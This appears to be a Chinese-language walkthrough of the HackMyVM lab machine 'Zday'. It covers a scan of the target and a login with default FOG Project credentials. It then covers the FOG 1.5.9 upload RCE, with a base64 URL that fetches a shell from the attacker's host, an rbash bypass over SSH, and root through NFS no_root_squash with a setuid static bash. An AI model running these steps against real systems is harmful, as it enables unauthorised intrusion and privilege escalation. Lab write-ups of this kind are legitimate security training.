- HMV
- rbash绕过
- no_root_squash
- 静态编译
- fogproject
1. 基本信息^toc
这里写目录标题
- 1. 基本信息^toc
- 2. 信息收集
- 2.1. 端口扫描
- 2.2. 目录扫描
- 3. fog project Rce
- 3.1. ssh绕过限制
- 4. NFS no_root_squash
- 5. bash运行不了怎么办
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Zday
作者 sml
难度 ⭐️⭐️⭐️⭐️⭐️
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# nmap 192.168.56.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 19:53 EST
Nmap scan report for 192.168.56.7
Host is up (0.00029s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
MAC Address: 08:00:27:36:9F:B5 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
首页是 appache
2.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# dirsearch -u http://192.168.56.7
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/Zday/reports/http_192.168.56.7/_24-12-19_19-55-54.txt
Target: http://192.168.56.7/
[19:56:05] 302 - 0B - /index.php -> /fog/index.php
[19:56:05] 302 - 0B - /index.php/login/ -> /fog/index.php
[19:56:10] 403 - 277B - /server-status
[19:56:10] 403 - 277B - /server-status/
3. fog project Rce
发现一个fog project的登录框
利用默认账号密码 fog : password
登录上去
看一下版本
搜索一下相关的漏洞
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# searchsploit fog
--------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting | asp/webapps/27071.txt
FOG Forum 0.8.1 - Multiple Local File Inclusions | php/webapps/5784.txt
FOGProject 1.5.9 - File Upload RCE (Authenticated) | php/webapps/49811.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
成功找到一个满足版本的 文件上传rce
尝试利用一下
参考文章完成利用 https://muzec0318.github.io/posts/articles/fog.html
但是我卡在了这一步
http://192.168.56.7/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguNTYuNi9teXNoZWxsCg==
&arch=arm64
因为它请求不了那个ftp
3.1. ssh绕过限制
在网站后台可以获取到一个账户名与密码
利用账户密码SSH上去会发现系统会立马中断我的bash
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7
fogproject@192.168.56.7's password:
Linux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 19 04:08:15 2024 from 192.168.56.6
You seem to be using the 'fogproject' system account to logon and work
on your FOG server system.
It's NOT recommended to use this account! Please create a new
account for administrative tasks.
If you re-run the installer it would reset the 'fog' account
password and therefore lock you out of the system!
Take care,
your FOGproject team
Connection to 192.168.56.7 closed.
这里我们利用 ssh fogproject@192.168.56.7 -t sh
进行绕过
也是一个属于 [[…/渗透姿势库/rbash绕过|rbash绕过]]的方式
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7 -t sh
fogproject@192.168.56.7's password:
$ whoami
fogproject
$ id
uid=1001(fogproject) gid=1001(fogproject) groups=1001(fogproject)
$
4. NFS no_root_squash
使用脚本检测出来NFS共享里面启用了 no_root_squash
╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 174 Mar 10 2021 /etc/exports
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)
其中 /images/dev 目录我们具有读写权限
参考利用 https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash
#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell
5. bash运行不了怎么办
安装hacktrick 上面利用可能会出现bash在靶机上运行不了
报错
$ ./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./bash)
这是由于版本不对
我们重新编译一个传过去即可
到 https://ftp.gnu.org/gnu/bash/ 下载一个时间差不多的版本。这里靶机是21年的我就下一个21年的bash
攻击机
tar -zxvf bash-5.1.8.tar.gz
./configure --enable-static-link --without-bash-malloc
make
cp bash /tmp/pe
chmod +s /tmp/pe/bash
受害机
./bash -p
bash-5.1# cat /root/root.txt
ihavebeenherealways
bash-5.1# cat /home/estas/user.txt
whereihavebeen